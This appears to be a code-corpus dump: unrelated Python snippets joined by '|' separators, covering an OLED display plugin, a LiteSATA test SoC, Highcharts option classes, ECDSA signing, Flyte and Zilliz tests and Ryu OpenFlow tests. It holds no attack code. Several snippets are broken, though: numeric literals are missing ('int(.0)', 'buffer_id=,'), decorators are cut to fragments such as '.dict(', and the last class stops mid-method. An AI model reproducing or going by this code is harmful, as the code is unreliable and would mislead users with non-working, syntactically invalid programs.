self.taskdevicepluginconfig[1] = int(float(self.taskdevicepluginconfig[1]))
if (self.taskdevicepluginconfig[1] != 0):
serialdev = i2c(port=i2cl, address=self.taskdevicepluginconfig[1])
else:
return self.initialized
self.device = None
try:
if ('x' in str(self.taskdevicepluginconfig[3])):
resstr = str(self.taskdevicepluginconfig[3]).split('x')
self.width = int(resstr[0])
self.height = int(resstr[1])
else:
self.width = None
self.height = None
except:
self.width = None
self.height = None
if ((str(self.taskdevicepluginconfig[0]) != '0') and (str(self.taskdevicepluginconfig[0]).strip() != '')):
try:
if (str(self.taskdevicepluginconfig[0]) == 'ssd1306'):
from luma.oled.device import ssd1306
if (self.height is None):
self.device = ssd1306(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])))
else:
self.device = ssd1306(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])), width=self.width, height=self.height)
self.initialized = True
elif (str(self.taskdevicepluginconfig[0]) == 'sh1106'):
from luma.oled.device import sh1106
if (self.height is None):
self.device = sh1106(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])))
else:
self.device = sh1106(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])), width=self.width, height=self.height)
self.initialized = True
elif (str(self.taskdevicepluginconfig[0]) == 'ssd1309'):
from luma.oled.device import ssd1309
if (self.height is None):
self.device = ssd1309(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])))
else:
self.device = ssd1309(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])), width=self.width, height=self.height)
self.initialized = True
elif (str(self.taskdevicepluginconfig[0]) == 'ssd1331'):
from luma.oled.device import ssd1331
if (self.height is None):
self.device = ssd1331(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])))
else:
self.device = ssd1331(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])), width=self.width, height=self.height)
self.initialized = True
elif (str(self.taskdevicepluginconfig[0]) == 'ssd1351'):
from luma.oled.device import ssd1351
if (self.height is None):
self.device = ssd1351(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])))
else:
self.device = ssd1351(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])), width=self.width, height=self.height)
self.initialized = True
elif (str(self.taskdevicepluginconfig[0]) == 'ssd1322'):
from luma.oled.device import ssd1322
if (self.height is None):
self.device = ssd1322(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])))
else:
self.device = ssd1322(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])), width=self.width, height=self.height)
self.initialized = True
elif (str(self.taskdevicepluginconfig[0]) == 'ssd1325'):
from luma.oled.device import ssd1325
if (self.height is None):
self.device = ssd1325(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])))
else:
self.device = ssd1325(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])), width=self.width, height=self.height)
self.initialized = True
elif (str(self.taskdevicepluginconfig[0]) == 'ssd1327'):
from luma.oled.device import ssd1327
if (self.height is None):
self.device = ssd1327(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])))
else:
self.device = ssd1327(serialdev, rotate=int(float(self.taskdevicepluginconfig[2])), width=self.width, height=self.height)
self.initialized = True
except Exception as e:
misc.addLog(rpieGlobals.LOG_LEVEL_ERROR, ('OLED can not be initialized! ' + str(e)))
self.enabled = False
self.device = None
return False
if (self.device is not None):
try:
lc = int(self.taskdevicepluginconfig[4])
except:
lc = self.P23_Nlines
if (lc < 1):
lc = self.P23_Nlines
lineheight = int((self.device.height / lc))
self.ufont = ImageFont.truetype('img/UbuntuMono-R.ttf', lineheight)
try:
self.device.show()
except:
pass
with canvas(self.device) as draw:
maxcols = int(self.taskdevicepluginconfig[5])
if (maxcols < 1):
maxcols = 1
tstr = ('X' * maxcols)
try:
sw = draw.textsize(tstr, self.ufont)[0]
except:
sw = self.device.width
while (sw > self.device.width):
lineheight -= 1
self.ufont = ImageFont.truetype('img/UbuntuMono-R.ttf', lineheight)
sw = draw.textsize(tstr, self.ufont)[0]
(self.charwidth, self.lineheight) = draw.textsize('X', self.ufont)
if (lc in [2, 4, 6, 8]):
self.lineheight += 1
if (self.interval > 2):
nextr = (self.interval - 2)
else:
nextr = 0
self._lastdataservetime = (rpieTime.millis() - (nextr * 1000))
self.dispimage = Image.new('1', (self.device.width, self.device.height), 'black')
else:
self.initialized = False
def webform_load(self):
choice1 = str(self.taskdevicepluginconfig[0])
import luma.oled.device
options = luma.oled.device.__all__
webserver.addHtml('<tr><td>Display type:<td>')
webserver.addSelector_Head('p023_type', True)
for d in range(len(options)):
webserver.addSelector_Item(options[d], options[d], (choice1 == options[d]), False)
webserver.addSelector_Foot()
choice2 = int(float(self.taskdevicepluginconfig[1]))
options = ['0x3c', '0x3d']
optionvalues = [60, 61]
webserver.addFormSelector('Address', 'p023_adr', len(options), options, optionvalues, None, choice2)
webserver.addFormNote("Enable <a href='pinout'>I2C bus</a> first, than <a href='i2cscanner'>search for the used address</a>!")
choice3 = int(float(self.taskdevicepluginconfig[2]))
options = ['Normal', 'Rotate by 90', 'Rotate by 180', 'Rotate by 270']
optionvalues = [0, 1, 2, 3]
webserver.addFormSelector('Mode', 'p023_rotate', len(optionvalues), options, optionvalues, None, choice3)
options = ['Default', '128x64', '128x128', '128x32', '96x96', '96x64', '64x48', '64x32']
choice4 = self.taskdevicepluginconfig[3]
webserver.addHtml('<tr><td>Resolution:<td>')
webserver.addSelector_Head('p023_res', False)
for d in range(len(options)):
webserver.addSelector_Item(options[d], options[d], (choice4 == options[d]), False)
webserver.addSelector_Foot()
choice5 = int(float(self.taskdevicepluginconfig[4]))
webserver.addHtml('<tr><td>Number of lines:<td>')
webserver.addSelector_Head('p023_linecount', False)
for l in range(1, (self.P23_Nlines + 1)):
webserver.addSelector_Item(str(l), l, (l == choice5), False)
webserver.addSelector_Foot()
webserver.addFormNumericBox('Try to display # characters per row', 'p023_charperl', self.taskdevicepluginconfig[5], 1, 32)
webserver.addFormNote("Leave it '1' if you do not care")
webserver.addFormCheckBox('Clear only used lines', 'p023_partialclear', self.taskdevicepluginconfig[6])
if ((choice5 > 0) and (choice5 < 9)):
lc = choice5
else:
lc = self.P23_Nlines
for l in range(lc):
try:
linestr = self.lines[l]
except:
linestr = ''
webserver.addFormTextBox(('Line' + str((l + 1))), ('p023_template' + str(l)), linestr, 128)
return True
def __del__(self):
try:
if (self.device is not None):
self.device.clear()
self.device.hide()
except:
pass
def plugin_exit(self):
self.__del__()
def webform_save(self, params):
par = webserver.arg('p023_type', params)
if (par == ''):
par = 0
self.taskdevicepluginconfig[0] = str(par)
par = webserver.arg('p023_adr', params)
if (par == ''):
par = 0
self.taskdevicepluginconfig[1] = int(par)
par = webserver.arg('p023_rotate', params)
if (par == ''):
par = 0
self.taskdevicepluginconfig[2] = int(par)
par = webserver.arg('p023_res', params)
self.taskdevicepluginconfig[3] = str(par)
par = webserver.arg('p023_linecount', params)
if (par == ''):
par = 8
self.taskdevicepluginconfig[4] = int(par)
par = webserver.arg('p023_charperl', params)
if (par == ''):
par = 1
self.taskdevicepluginconfig[5] = int(par)
if (webserver.arg('p023_partialclear', params) == 'on'):
self.taskdevicepluginconfig[6] = True
else:
self.taskdevicepluginconfig[6] = False
for l in range(self.P23_Nlines):
linestr = webserver.arg(('p023_template' + str(l)), params).strip()
try:
self.lines[l] = linestr
except:
self.lines.append(linestr)
self.plugin_init()
return True
def plugin_read(self):
if (self.initialized and self.enabled and self.device):
try:
if (self.taskdevicepluginconfig[6] == False):
self.dispimage = Image.new('1', (self.device.width, self.device.height), 'black')
if self.dispimage:
draw = ImageDraw.Draw(self.dispimage)
for l in range(int(self.taskdevicepluginconfig[4])):
resstr = ''
try:
linestr = str(self.lines[l])
resstr = self.oledparse(linestr)
except:
resstr = ''
if (resstr != ''):
y = (l * self.lineheight)
if self.taskdevicepluginconfig[6]:
draw.rectangle(((0, (y + 2)), (self.device.width, (y + self.lineheight))), fill='black')
draw.text((0, y), resstr, fill='white', font=self.ufont)
self.device.display(self.dispimage)
except Exception as e:
misc.addLog(rpieGlobals.LOG_LEVEL_ERROR, ('OLED write error! ' + str(e)))
self._lastdataservetime = rpieTime.millis()
return True
def plugin_write(self, cmd):
res = False
cmdarr = cmd.split(',')
cmdarr[0] = cmdarr[0].strip().lower()
if (cmdarr[0] == 'oledcmd'):
try:
cmd = cmdarr[1].strip()
except:
cmd = ''
try:
if (self.device is not None):
if (cmd == 'on'):
self.device.show()
res = True
elif (cmd == 'off'):
self.device.hide()
res = True
elif (cmd == 'clear'):
self.device.clear()
self.dispimage = Image.new('1', (self.device.width, self.device.height), 'black')
res = True
elif (cmd == 'clearline'):
try:
l = int(cmdarr[2].strip())
except Exception as e:
misc.addLog(rpieGlobals.LOG_LEVEL_ERROR, ('Parameter error: ' + str(e)))
return False
if ((self.device is not None) and (self.dispimage is not None)):
if (l > 0):
l -= 1
draw = ImageDraw.Draw(self.dispimage)
y = (l * self.lineheight)
draw.rectangle(((0, (y + 2)), (self.device.width, (y + self.lineheight))), fill='black')
self.device.display(self.dispimage)
res = True
if (cmd == 'low'):
self.device.contrast(64)
res = True
if (cmd == 'med'):
self.device.contrast(207)
res = True
if (cmd == 'high'):
self.device.contrast(255)
res = True
except Exception as e:
misc.addLog(rpieGlobals.LOG_LEVEL_ERROR, ('OLED command error! ' + str(e)))
res = False
elif (cmdarr[0] == 'oled'):
sepp = (((len(cmdarr[0]) + len(cmdarr[1])) + len(cmdarr[2])) + 1)
sepp = cmd.find(',', sepp)
try:
y = int(cmdarr[1].strip())
x = int(cmdarr[2].strip())
text = cmd[(sepp + 1):]
except Exception as e:
misc.addLog(rpieGlobals.LOG_LEVEL_ERROR, ('Parameter error: ' + str(e)))
return False
if (x > 0):
x -= 1
if (y > 0):
y -= 1
try:
if (self.device is not None):
draw = ImageDraw.Draw(self.dispimage)
resstr = self.oledparse(text)
draw.text(((x * self.charwidth), (y * self.lineheight)), resstr, fill='white', font=self.ufont)
self.device.display(self.dispimage)
res = True
except Exception as e:
misc.addLog(rpieGlobals.LOG_LEVEL_ERROR, ('OLED command error! ' + str(e)))
res = False
return res
def oledparse(self, ostr):
(cl, st) = commands.parseruleline(ostr)
if (st == 'CMD'):
resstr = str(cl)
else:
resstr = str(ostr)
if (('{' in resstr) or ('&' in resstr)):
resstr = resstr.replace('{D}', ' ').replace('°', ' ')
resstr = resstr.replace('{<<}', '').replace('«', '')
resstr = resstr.replace('{>>} ', '').replace('»', '')
resstr = resstr.replace('{u} ', '').replace('µ ', '')
resstr = resstr.replace('{E}', '').replace('€', '')
resstr = resstr.replace('{Y}', '').replace('¥', '')
resstr = resstr.replace('{P}', '').replace('£', '')
resstr = resstr.replace('{c}', '').replace('¢', '')
resstr = resstr.replace('{^1}', '1').replace('¹', '1')
resstr = resstr.replace('{^2}', '2').replace('²', '2')
resstr = resstr.replace('{^3}', '3').replace('³', '3')
resstr = resstr.replace('{1_4}', '14').replace('¼', '14')
resstr = resstr.replace('{1_2}', '12').replace('&frac24;', '12')
resstr = resstr.replace('{3_4}', '34').replace('¾', '34')
resstr = resstr.replace('{+-}', '').replace('±', '')
resstr = resstr.replace('{x}', '').replace('×', '')
resstr = resstr.replace('{..}', '').replace('÷', '')
return resstr |
.django_db
def test_category_awarding_agency_subawards(agency_test_data):
test_payload = {'category': 'awarding_agency', 'subawards': True, 'page': 1, 'limit': 50}
spending_by_category_logic = AwardingAgencyViewSet().perform_search(test_payload, {})
expected_response = {'category': 'awarding_agency', 'limit': 50, 'page_metadata': {'page': 1, 'next': None, 'previous': None, 'hasNext': False, 'hasPrevious': False}, 'results': [{'amount': 150, 'name': 'Awarding Toptier Agency 3', 'code': 'TA3', 'id': 1003}], 'messages': [get_time_period_message()]}
assert (expected_response == spending_by_category_logic) |
def get_schema(action):
options = {}
defaults = [option_defaults.allow_ilm_indices(), option_defaults.continue_if_exception(), option_defaults.disable_action(), option_defaults.ignore_empty_list(), option_defaults.timeout_override(action)]
for each in defaults:
options.update(each)
for each in action_specific(action):
options.update(each)
return Schema(options) |
def extractMandarinducktalesWordpressCom(item):
(vol, chp, frag, postfix) = extractVolChapterFragmentPostfix(item['title'])
if ((not (chp or vol)) or ('preview' in item['title'].lower())):
return None
tagmap = [('PRC', 'PRC', 'translated'), ('Loiterous', 'Loiterous', 'oel')]
for (tagname, name, tl_type) in tagmap:
if (tagname in item['tags']):
return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
return False |
class OptionSeriesWindbarbSonificationPointgrouping(Options):
def algorithm(self):
return self._config_get('minmax')
def algorithm(self, text: str):
self._config(text, js_type=False)
def enabled(self):
return self._config_get(True)
def enabled(self, flag: bool):
self._config(flag, js_type=False)
def groupTimespan(self):
return self._config_get(15)
def groupTimespan(self, num: float):
self._config(num, js_type=False)
def prop(self):
return self._config_get('y')
def prop(self, text: str):
self._config(text, js_type=False) |
def gen_accessor_doc(out, name):
common_top_matter(out, name)
out.write('/* DOCUMENTATION ONLY */\n')
for cls in of_g.standard_class_order:
if type_maps.class_is_virtual(cls):
pass
out.write(('\n/**\n * Structure for %(cls)s object. Get/set\n * accessors available in all versions unless noted otherwise\n *\n' % dict(cls=cls)))
if loxi_utils.class_is_list(cls):
out.write((' * first Function of type %(cls)s_first_f.\n * Setup a TBD class object to the first entry in the list\n * next Function of type %(cls)s_next_f.\n * Advance a TBD class object to the next entry in the list\n * append_bind Function of type %(cls)s_append_bind_f\n * Setup a TBD class object for append to the end of the current list\n * append Function of type %(cls)s_append_f.\n * Copy an item to the end of a list\n' % dict(cls=cls)))
for m_name in of_g.ordered_members[cls]:
if (m_name in of_g.skip_members):
continue
ver_type_map = field_ver_get(cls, m_name)
(m_type, get_rv) = get_acc_rv(cls, m_name)
if (len(ver_type_map) == 3):
ver_string = ''
else:
ver_string = '('
for ver in sorted(ver_type_map):
ver_string += (' ' + of_g.short_version_names[ver])
ver_string += ').'
f_name = acc_name(cls, m_name)
out.write((' * %(m_name)s_get/set %(ver_string)s\n * Accessors for %(m_name)s, a variable of type %(m_type)s. Functions\n * are of type %(f_name)s_get_f and _set_f.\n *\n' % dict(f_name=f_name, m_name=m_name, ver_string=ver_string, m_type=m_type)))
out.write((' */\ntypedef struct %(cls)s_s %(cls)s_t;\n' % dict(cls=cls)))
out.write('#endif /* _LOCI_DOC_H_ */\n') |
def eit_loc_eval(ds: np.ndarray, mesh_obj: mesh.PyEITMesh, mode: str='element'):
loc = np.argmax(np.abs(ds))
if (mode == 'node'):
loc_xyz = mesh_obj.node[loc]
else:
loc_xyz = mesh_obj.elem_centers[loc]
ds_max = ds[loc]
ds_sign = np.sign(ds_max)
return (loc_xyz, ds_max, ds_sign) |
class SATATestSoC(SoCMini):
def __init__(self, platform, gen='gen3', with_analyzer=False):
assert (gen in ['gen1', 'gen2', 'gen3'])
sys_clk_freq = int(.0)
sata_clk_freq = {'gen1': .0, 'gen2': .0, 'gen3': .0}[gen]
self.submodules.crg = _CRG(platform, sys_clk_freq)
SoCMini.__init__(self, platform, sys_clk_freq, ident='LiteSATA bench on Genesys2')
self.add_uartbone()
self.submodules.sata_phy = LiteSATAPHY(platform.device, pads=platform.request('fmc2sata'), gen=gen, clk_freq=sys_clk_freq, data_width=16)
self.submodules.sata_core = LiteSATACore(self.sata_phy)
self.submodules.sata_crossbar = LiteSATACrossbar(self.sata_core)
self.submodules.sata_bist = LiteSATABIST(self.sata_crossbar, with_csr=True)
platform.add_period_constraint(self.sata_phy.crg.cd_sata_tx.clk, (.0 / sata_clk_freq))
platform.add_period_constraint(self.sata_phy.crg.cd_sata_rx.clk, (.0 / sata_clk_freq))
self.platform.add_false_path_constraints(self.crg.cd_sys.clk, self.sata_phy.crg.cd_sata_tx.clk, self.sata_phy.crg.cd_sata_rx.clk)
sys_counter = Signal(32)
self.sync.sys += sys_counter.eq((sys_counter + 1))
self.comb += platform.request('user_led', 0).eq(sys_counter[26])
tx_counter = Signal(32)
self.sync.sata_tx += tx_counter.eq((tx_counter + 1))
self.comb += platform.request('user_led', 1).eq(tx_counter[26])
rx_counter = Signal(32)
self.sync.sata_rx += rx_counter.eq((rx_counter + 1))
self.comb += platform.request('user_led', 2).eq(rx_counter[26])
self.comb += platform.request('user_led', 3).eq(self.sata_phy.ctrl.ready)
if with_analyzer:
analyzer_signals = [self.sata_phy.phy.tx_init.fsm, self.sata_phy.phy.rx_init.fsm, self.sata_phy.ctrl.fsm, self.sata_phy.ctrl.ready, self.sata_phy.source, self.sata_phy.sink, self.sata_core.command.sink, self.sata_core.command.source, self.sata_core.link.rx.fsm, self.sata_core.link.tx.fsm, self.sata_core.transport.rx.fsm, self.sata_core.transport.tx.fsm, self.sata_core.command.rx.fsm, self.sata_core.command.tx.fsm]
self.submodules.analyzer = LiteScopeAnalyzer(analyzer_signals, 512, csr_csv='analyzer.csv') |
def getDBC_v(x, flag):
if (flag in [boundaryTags['left']]):
return (lambda x, t: 0.0)
elif (flag in [boundaryTags['front'], boundaryTags['back'], boundaryTags['top'], boundaryTags['bottom'], boundaryTags['obstacle']]):
return (lambda x, t: 0.0)
elif ((ns_forceStrongDirichlet == False) and (flag == boundaryTags['right'])):
return (lambda x, t: 0.0) |
def pdf_to_string(pdf_file):
fp = open(pdf_file, 'rb')
parser = PDFParser(fp)
doc = PDFDocument()
parser.set_document(doc)
doc.set_parser(parser)
doc.initialize('')
rsrcmgr = PDFResourceManager()
laparams = LAParams()
laparams.line_margin = 0.3
laparams.word_margin = 0.3
device = PDFPageAggregator(rsrcmgr, laparams=laparams)
interpreter = PDFPageInterpreter(rsrcmgr, device)
for page in doc.get_pages():
interpreter.process_page(page)
layout = device.get_result()
for lt_obj in layout:
print(lt_obj) |
def test_create_and_link_node_from_remote_ignore():
def wf(i: int, j: int):
...
lp = LaunchPlan.get_or_create(wf, name='promise-test', fixed_inputs={'i': 1}, default_inputs={'j': 10})
ctx = context_manager.FlyteContext.current_context().with_compilation_state(CompilationState(prefix=''))
with pytest.raises(FlyteAssertion, match='Missing input `i` type `<FlyteLiteral simple: INTEGER>`'):
create_and_link_node_from_remote(ctx, lp)
create_and_link_node_from_remote(ctx, lp, _inputs_not_allowed={'i'}, _ignorable_inputs={'j'})
with pytest.raises(FlyteAssertion, match="ixed inputs cannot be specified. Please remove the following inputs - {'i'}"):
create_and_link_node_from_remote(ctx, lp, _inputs_not_allowed={'i'}, _ignorable_inputs={'j'}, i=15)
create_and_link_node_from_remote(ctx, lp, _inputs_not_allowed={'i'}, _ignorable_inputs={'j'}, j=15) |
class TestZillizVectorDBConfig():
.dict(os.environ, {'ZILLIZ_CLOUD_URI': 'mocked_uri', 'ZILLIZ_CLOUD_TOKEN': 'mocked_token'})
def test_init_with_uri_and_token(self):
expected_uri = 'mocked_uri'
expected_token = 'mocked_token'
db_config = ZillizDBConfig()
assert (db_config.uri == expected_uri)
assert (db_config.token == expected_token)
.dict(os.environ, {'ZILLIZ_CLOUD_URI': 'mocked_uri', 'ZILLIZ_CLOUD_TOKEN': 'mocked_token'})
def test_init_without_uri(self):
try:
del os.environ['ZILLIZ_CLOUD_URI']
except KeyError:
pass
with pytest.raises(AttributeError):
ZillizDBConfig()
.dict(os.environ, {'ZILLIZ_CLOUD_URI': 'mocked_uri', 'ZILLIZ_CLOUD_TOKEN': 'mocked_token'})
def test_init_without_token(self):
try:
del os.environ['ZILLIZ_CLOUD_TOKEN']
except KeyError:
pass
with pytest.raises(AttributeError):
ZillizDBConfig() |
class OptionSeriesVariablepieTooltip(Options):
def clusterFormat(self):
return self._config_get('Clustered points: {point.clusterPointsAmount}')
def clusterFormat(self, text: str):
self._config(text, js_type=False)
def dateTimeLabelFormats(self) -> 'OptionSeriesVariablepieTooltipDatetimelabelformats':
return self._config_sub_data('dateTimeLabelFormats', OptionSeriesVariablepieTooltipDatetimelabelformats)
def distance(self):
return self._config_get(16)
def distance(self, num: float):
self._config(num, js_type=False)
def followPointer(self):
return self._config_get(True)
def followPointer(self, flag: bool):
self._config(flag, js_type=False)
def followTouchMove(self):
return self._config_get(True)
def followTouchMove(self, flag: bool):
self._config(flag, js_type=False)
def footerFormat(self):
return self._config_get('')
def footerFormat(self, text: str):
self._config(text, js_type=False)
def format(self):
return self._config_get('undefined')
def format(self, text: str):
self._config(text, js_type=False)
def headerFormat(self):
return self._config_get(None)
def headerFormat(self, text: str):
self._config(text, js_type=False)
def nullFormat(self):
return self._config_get(None)
def nullFormat(self, text: str):
self._config(text, js_type=False)
def nullFormatter(self):
return self._config_get(None)
def nullFormatter(self, value: Any):
self._config(value, js_type=False)
def pointFormat(self):
return self._config_get('<span style="color:{point.color}"></span> {series.name}<br/>Value: {point.y}<br/>Size: {point.z}<br/>')
def pointFormat(self, text: str):
self._config(text, js_type=False)
def pointFormatter(self):
return self._config_get(None)
def pointFormatter(self, value: Any):
self._config(value, js_type=False)
def valueDecimals(self):
return self._config_get(None)
def valueDecimals(self, num: float):
self._config(num, js_type=False)
def valuePrefix(self):
return self._config_get(None)
def valuePrefix(self, text: str):
self._config(text, js_type=False)
def valueSuffix(self):
return self._config_get(None)
def valueSuffix(self, text: str):
self._config(text, js_type=False)
def xDateFormat(self):
return self._config_get(None)
def xDateFormat(self, text: str):
self._config(text, js_type=False) |
def add_resource_b(db_session, resource_id, resource_name='test_resource'):
Resource.__possible_permissions__ = ['test_perm', 'test_perm1', 'test_perm2', 'foo_perm', 'group_perm', 'group_perm2']
resource = ResourceTestobjB(resource_id=resource_id, resource_name=resource_name)
db_session.add(resource)
db_session.flush()
return resource |
def get_matched_value_counts(value_counts: pd.Series, other_to_match: pd.Series) -> pd.Series:
matched_series = pd.Series(index=other_to_match.index, dtype=float)
for ind in matched_series.index:
if (ind in value_counts):
matched_series[ind] = value_counts[ind]
else:
matched_series[ind] = 0.0
if (OTHERS_GROUPED in matched_series.index):
total = sum(value_counts)
total_in_other = (total - sum(matched_series))
matched_series[OTHERS_GROUPED] = total_in_other
return matched_series |
def philox_round(W, N, rnd, ctr, key):
ctr = ctr.copy()
rnd = numpy.cast[ctr.dtype](rnd)
if (N == 2):
key0 = (key[0] + (PHILOX_W[W][0] * rnd))
(hi, lo) = philox_mulhilo(W, PHILOX_M[(W, N)][0], ctr[0])
ctr[0] = ((hi ^ key0) ^ ctr[1])
ctr[1] = lo
else:
key0 = (key[0] + (PHILOX_W[W][0] * rnd))
key1 = (key[1] + (PHILOX_W[W][1] * rnd))
(hi0, lo0) = philox_mulhilo(W, PHILOX_M[(W, N)][0], ctr[0])
(hi1, lo1) = philox_mulhilo(W, PHILOX_M[(W, N)][1], ctr[2])
ctr[0] = ((hi1 ^ ctr[1]) ^ key0)
ctr[1] = lo1
ctr[2] = ((hi0 ^ ctr[3]) ^ key1)
ctr[3] = lo0
return ctr |
class Folder(Boxes):
def __init__(self) -> None:
Boxes.__init__(self)
self.addSettingsArgs(edges.FlexSettings)
self.buildArgParser('x', 'y', 'h')
self.argparser.add_argument('--r', action='store', type=float, default=10.0, help='radius of the corners')
self.argparser.set_defaults(h=20)
def render(self):
(x, y, r, h) = (self.x, self.y, self.r, self.h)
c2 = (math.pi * h)
self.moveTo((r + self.thickness), self.thickness)
self.edge((x - r))
self.edges['X'](c2, y)
self.edge((x - r))
self.corner(90, r)
self.edge((y - (2 * r)))
self.corner(90, r)
self.edge((((2 * x) - (2 * r)) + c2))
self.corner(90, r)
self.edge((y - (2 * r)))
self.corner(90, r) |
class Invite(object):
SIGNATURE = 2100
def build(server_peer_id: PeerID, client_peer_id: PeerID) -> Invite:
data = InviteData(server_peer_id, client_peer_id)
header = Header.build(Invite.SIGNATURE, 0, len(data.to_binary_plist()))
msg = Invite(header, data)
msg.fix_checksum()
return msg
def __init__(self, header: Header, data: InviteData):
self.header = header
self.data = data
def fix_checksum(self) -> None:
self.header._cfields['crc32'] = 0
without_crc = self.to_raw_data()
self.header._cfields['crc32'] = zlib.crc32(without_crc)
def to_raw_data(self) -> bytes:
return (self.header.to_raw_data() + self.data.to_binary_plist())
def print(self, full=False) -> None:
print('')
if full:
print(' ')
self.header.print()
self.data.print() |
def ecdsa_raw_sign(msg_hash: bytes, private_key_bytes: bytes) -> Tuple[(int, int, int)]:
z = big_endian_to_int(msg_hash)
k = deterministic_generate_k(msg_hash, private_key_bytes)
(r, y) = fast_multiply(G, k)
s_raw = ((inv(k, N) * (z + (r * big_endian_to_int(private_key_bytes)))) % N)
v = (27 + ((y % 2) ^ (0 if ((s_raw * 2) < N) else 1)))
s = (s_raw if ((s_raw * 2) < N) else (N - s_raw))
return ((v - 27), r, s) |
class RunTest(tester.TestFlowBase):
OFP_VERSIONS = [ofproto_v1_2.OFP_VERSION]
def __init__(self, *args, **kwargs):
super(RunTest, self).__init__(*args, **kwargs)
self._verify = None
self.n_tables = ofproto_v1_2.OFPTT_MAX
def start_next_test(self, dp):
self._verify = None
self.delete_all_flows(dp)
dp.send_barrier()
if len(self.pending):
t = self.pending.pop()
if self.is_supported(t):
LOG.info(tester.LOG_TEST_START, t)
self.current = t
getattr(self, t)(dp)
else:
self.results[t] = 'SKIP (unsupported)'
self.unclear -= 1
self.start_next_test(dp)
else:
self.print_results()
def run_verify(self, ev):
msg = ev.msg
dp = msg.datapath
verify_func = self.verify_default
v = ('verify' + self.current[4:])
if (v in dir(self)):
verify_func = getattr(self, v)
result = verify_func(dp, msg)
if (result is True):
self.unclear -= 1
self.results[self.current] = result
self.start_next_test(dp)
def verify_default(self, dp, msg):
type_ = self._verify
if (msg.msg_type == dp.ofproto.OFPT_STATS_REPLY):
return self.verify_stats(dp, msg.body, type_)
elif (msg.msg_type == type_):
return True
else:
return ('Reply msg_type %s expected %s' % (msg.msg_type, type_))
def verify_stats(self, dp, stats, type_):
stats_types = dp.ofproto_parser.OFPStatsReply._STATS_TYPES
expect = stats_types.get(type_).__name__
if isinstance(stats, list):
for s in stats:
if (expect == s.__class__.__name__):
return True
elif (expect == stats.__class__.__name__):
return True
return ("Reply msg has not '%s' class.\n%s" % (expect, stats))
def mod_flow(self, dp, cookie=0, cookie_mask=0, table_id=0, command=None, idle_timeout=0, hard_timeout=0, priority=255, buffer_id=, match=None, actions=None, inst_type=None, out_port=None, out_group=None, flags=0, inst=None):
if (command is None):
command = dp.ofproto.OFPFC_ADD
if (inst is None):
if (inst_type is None):
inst_type = dp.ofproto.OFPIT_APPLY_ACTIONS
inst = []
if (actions is not None):
inst = [dp.ofproto_parser.OFPInstructionActions(inst_type, actions)]
if (match is None):
match = dp.ofproto_parser.OFPMatch()
if (out_port is None):
out_port = dp.ofproto.OFPP_ANY
if (out_group is None):
out_group = dp.ofproto.OFPG_ANY
m = dp.ofproto_parser.OFPFlowMod(dp, cookie, cookie_mask, table_id, command, idle_timeout, hard_timeout, priority, buffer_id, out_port, out_group, flags, match, inst)
dp.send_msg(m)
def get_port(self, dp):
for (port_no, port) in dp.ports.items():
if (port_no != dp.ofproto.OFPP_LOCAL):
return port
return None
def test_desc_stats_request(self, dp):
self._verify = dp.ofproto.OFPST_DESC
m = dp.ofproto_parser.OFPDescStatsRequest(dp)
dp.send_msg(m)
def test_flow_stats_request(self, dp):
self._verify = dp.ofproto.OFPST_FLOW
self.mod_flow(dp)
self.send_flow_stats(dp)
def test_aggregate_stats_request(self, dp):
self._verify = dp.ofproto.OFPST_AGGREGATE
match = dp.ofproto_parser.OFPMatch()
m = dp.ofproto_parser.OFPAggregateStatsRequest(dp, dp.ofproto.OFPTT_ALL, dp.ofproto.OFPP_ANY, dp.ofproto.OFPG_ANY, 0, 0, match)
dp.send_msg(m)
def test_table_stats_request(self, dp):
self._verify = dp.ofproto.OFPST_TABLE
m = dp.ofproto_parser.OFPTableStatsRequest(dp)
dp.send_msg(m)
def test_port_stats_request(self, dp):
self._verify = dp.ofproto.OFPST_PORT
m = dp.ofproto_parser.OFPPortStatsRequest(dp, dp.ofproto.OFPP_ANY)
dp.send_msg(m)
def test_echo_request(self, dp):
self._verify = dp.ofproto.OFPT_ECHO_REPLY
m = dp.ofproto_parser.OFPEchoRequest(dp)
dp.send_msg(m)
def test_features_request(self, dp):
self._verify = dp.ofproto.OFPT_FEATURES_REPLY
m = dp.ofproto_parser.OFPFeaturesRequest(dp)
dp.send_msg(m)
def test_get_config_request(self, dp):
self._verify = dp.ofproto.OFPT_GET_CONFIG_REPLY
m = dp.ofproto_parser.OFPGetConfigRequest(dp)
dp.send_msg(m)
def test_barrier_request(self, dp):
self._verify = dp.ofproto.OFPT_BARRIER_REPLY
dp.send_barrier()
def test_error_reply(self, dp):
ports = [0]
for p in dp.ports:
if (p != dp.ofproto.OFPP_LOCAL):
ports.append(p)
port_no = (max(ports) + 1)
self._verify = dp.ofproto.OFPT_ERROR
m = dp.ofproto_parser.OFPPortMod(dp, port_no, 'ff:ff:ff:ff:ff:ff', 0, 0, 0)
dp.send_msg(m)
def test_flow_stats_none(self, dp):
self.send_flow_stats(dp)
def verify_flow_stats_none(self, dp, msg):
stats = msg.body
if len(stats):
return ('Reply msg has body. %s' % (stats,))
return True
def test_flow_stats_reply_value(self, dp):
self._verify = []
c = 0
while (c < self.n_tables):
v = (c, (c + 1), (c + 2), (c + 3), (c + 4))
self._verify.append(v)
self.mod_flow(dp, table_id=v[0], cookie=v[1], idle_timeout=v[2], hard_timeout=v[3], priority=v[4])
c += 1
dp.send_barrier()
self.send_flow_stats(dp)
def verify_flow_stats_reply_value(self, dp, msg):
c = 0
for f in msg.body:
f_value = (f.table_id, f.cookie, f.idle_timeout, f.hard_timeout, f.priority)
if (f_value != self._verify[c]):
return ('param is mismatched. verify=%s, reply=%s' % (self._verify[c], f_value))
c += 1
return (len(msg.body) == self.n_tables)
def test_echo_request_has_data(self, dp):
data = 'test'
self._verify = data
